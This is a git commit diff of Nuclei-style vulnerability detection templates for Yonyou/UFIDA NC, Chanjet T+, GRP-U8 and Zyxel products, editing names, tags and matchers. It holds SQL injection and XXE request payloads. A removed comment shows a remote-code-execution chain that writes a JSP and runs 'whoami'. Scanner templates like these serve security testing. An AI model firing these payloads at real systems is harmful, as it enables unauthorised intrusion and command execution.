updated-templates-p

patch-1
Prince Chaddha 2023-09-17 14:21:38 +05:30
parent 88153faaf8
commit 274c14e763
14 changed files with 29 additions and 81 deletions

View File

@ -1,11 +1,11 @@
id: yonyou-nc-uapjs-jsinvoke-fileupload id: CNVD-C-2023-76801
info: info:
name: Yonyou NC uapjs jsinvoke 文件上传漏洞 name: UFIDA NC uapjs - RCE vulnerability
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: 用友NC 及 NCC系统存在任意方法调用漏洞通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。 description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
tags: yonyou tags: cvnd,cvnd2023,yonyou,rce
http: http:
- raw: - raw:
@ -28,15 +28,3 @@ http:
- status_code_1 == 200 - status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}") - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
condition: and condition: and
# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
# Host: {{Hostname}}
# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
# Host: {{Hostname}}
# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

View File

@ -1,7 +1,7 @@
id: CVE-2022-0342 id: CVE-2022-0342
info: info:
name: Zyxel - Authentication Bypass name: Zyxel - Authentication Bypass
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: | description: |
@ -10,7 +10,7 @@ info:
max-request: 1 max-request: 1
fofa-query: app="ZyXEL-USG-FLEX" fofa-query: app="ZyXEL-USG-FLEX"
verified: true verified: true
tags: cve,cve2022,zyxel,auth-bypass tags: cve,cve2022,zyxel,auth-bypass,router
http: http:
- method: GET - method: GET

View File

@ -1,11 +1,11 @@
id: chanjet-gnremote-sqli id: chanjet-gnremote-sqli
info: info:
name: Changjietong Remote Communication GNRemote.dll - SQL Injection name: Changjietong Remote Communication GNRemote.dll - SQL Injection
author: SleepingBag945 author: SleepingBag945
severity: high severity: high
description: | description: |
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference: | reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata: metadata:
@ -38,14 +38,8 @@ http:
part: body_1 part: body_1
words: words:
- "{\"RetCode\":0}" - "{\"RetCode\":0}"
condition: and
- type: word - type: word
part: body_2 part: body_2
words: words:
- "{\"RetCode\":2}" - "{\"RetCode\":2}"
condition: and
- type: status
status:
- 200

View File

@ -28,6 +28,7 @@ http:
- "<configuration>" - "<configuration>"
condition: and condition: and
- type: status - type: word
status: part: header
- 200 words:
- "application/octet-stream"

View File

@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
info: info:
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
author: SleepingBag945 author: SleepingBag945
severity: critical severity: high
description: | description: |
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server. There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
reference: reference:

View File

@ -20,20 +20,15 @@ http:
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1 POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""} {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "0x06d49632c9dc9bcb62aeaef99612ba6b" - "0x06d49632c9dc9bcb62aeaef99612ba6b"
- "Message\":\"245" - "Message\":\"245"
- "DatabaseException" - "DatabaseException"
part: body
condition: and condition: and
- type: status
status:
- 200

View File

@ -1,21 +0,0 @@
id: chanjetcrm-createsite-sqli
info:
name: Chanjetcrm - create_site SQL Injection
author: unknown
severity: critical
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://stack.chaitin.com/techblog/detail?id=10
tags: chanjetcrm,sqli
http:
- method: GET
path:
- "{{BaseURL}}/WebSer~1/create_site.php?site_id=1"
matchers:
- type: word
words:
- "register fail,please again"
part: body

View File

@ -1,4 +1,4 @@
id: yonyou-nc-filereceiveservlet-fileupload id: yonyou-filereceiveservlet-fileupload
info: info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
@ -12,7 +12,7 @@ info:
max-request: 1 max-request: 1
fofa-query: app="用友-UFIDA-NC" fofa-query: app="用友-UFIDA-NC"
verified: true verified: true
tags: yonyou,nc,fileupload,intrusive tags: yonyou,fileupload,intrusive
variables: variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp" file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"

View File

@ -1,10 +1,10 @@
id: yonyou-grp-u8-sqli id: yonyou-grp-u8-xxe
info: info:
name: yonyou-grp-u8-sqli name: Yonyou UFIDA GRP-u8 - XXE
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: 用友GRP-u8存在XXE漏洞该漏洞源于应用程序解析XML输入时没有进制外部实体的加载导致可加载外部SQL语句以及命令执行 description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
reference: reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou,grp,xxe,sqli tags: yonyou,grp,xxe,sqli
@ -14,26 +14,17 @@ http:
- | - |
POST /Proxy HTTP/1.1 POST /Proxy HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip Accept-Encoding: gzip
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "1759837260" - "1759837260"
- type: word - type: word
words: words:
- "<R9PACKET>" - "<R9PACKET>"
- type: status
status:
- 200
# 可尝试启动并调用xpcmdshell执行命令

View File

@ -22,5 +22,5 @@ http:
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'status_code_1 == 200 && contains(body_1,"java.io")' - 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
condition: and condition: and

View File

@ -11,7 +11,7 @@ info:
metadata: metadata:
fofa-query: icon_hash="1085941792" fofa-query: icon_hash="1085941792"
verified: true verified: true
tags: yonyou,nc,intrusive tags: yonyou,intrusive,fileupload
http: http:
- raw: - raw:

View File

@ -13,7 +13,7 @@ info:
max-request: 2 max-request: 2
fofa-query: app="用友-UFIDA-NC fofa-query: app="用友-UFIDA-NC
verified: true verified: true
tags: yonyou,nc,intrusive tags: yonyou,intrusive,ufida,fileupload
variables: variables:
v1: "{{rand_int(1,100)}}" v1: "{{rand_int(1,100)}}"

View File

@ -1,7 +1,7 @@
id: yonyou-nc-ncmessageservlet-rce id: yonyou-nc-ncmessageservlet-rce
info: info:
name: UFIDA NC NCMessageServlet - Deserialization RCE Detect name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: | description: |
@ -12,7 +12,7 @@ info:
max-request: 2 max-request: 2
fofa-query: app="用友-UFIDA-NC fofa-query: app="用友-UFIDA-NC
verified: true verified: true
tags: yonyou,rce,deserialization,nc tags: yonyou,rce,deserialization,rce
http: http:
- raw: - raw:

View File

@ -1,7 +1,7 @@
id: yonyou-u8-crm-lfi id: yonyou-u8-crm-lfi
info: info:
name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
author: SleepingBag945 author: SleepingBag945
severity: high severity: high
description: | description: |